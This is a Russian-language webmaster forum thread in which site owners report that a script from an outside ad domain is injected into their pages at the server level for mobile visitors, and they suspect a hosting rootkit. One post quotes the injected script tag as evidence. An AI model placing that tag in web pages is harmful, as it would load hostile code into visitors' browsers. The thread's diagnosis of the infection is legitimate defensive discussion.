hakuna matata

Рейтинг
253
Регистрация
14.01.2012
В любом случае НЕ сообщать хостеру о проблеме - это тупо.

а разве мы не сообщали?

похоже, придется долго им объяснять о сути проблемы, пробиваясь через первую линию поддержки

hvosting, я отписал тикет саппорту, валить никуда не призывал.

но проблема на самом деле есть.

более того, не так давно несколько знакомых жаловались на такой же вредный код (и домен тот же) на своих арендованных серверах.

а этот тред нужен хотя бы для того, чтобы не терять время на "проверьте свой компьютер на вирусы, а CMS на уязвимости".

код инклюдится даже в одностраничники на html. причем не вставляется напрямую в исходники страницы, а подгружается вебсервером на лету.

проверил свои сайты, подтверждаю

при просмотре с мобильным юзерагентом и уникальным ip в сорцах страницы такое:

<script type="text/javascript" src="http://ads.sdnsistems.net/mob.php?17657216209"></script></head>

хостер таймвеб

Неоднократная проверка файлов и бд ничего не выявила, поэтому тоже подозрения на руткит. Вот только как удалить его пока так и не понял.

руткит - никак, только переустанавливать операционную систему начисто

а вообще есть подтверждения истории о ментах от других источников?

extra:
Первая часть - да, по второй - пусть это будут ваши предположения, я не имею понятия, как там все было.

предположение, но помоему вполне логичное.

extra, то есть, сервера забрали только не у всего дц, а только у yahoster?

если так, то следовательно, осмелюсь предположить - черные чуваки хостились именно у него?

lhoster:
Да. Все подряд. Типа акция у них была.

если так, то я совсем не понимаю, почему yahoster за весь дц отписывается.

WapGraf, спасибо.

и чтобы до конца прояснить ситуацию - сервера забрали все подряд, из всего дц?

yahoster, я наверное не совсем в теме, вы являетесь овнером дц (или стоек), откуда изъяли сервера?

Всего: 2218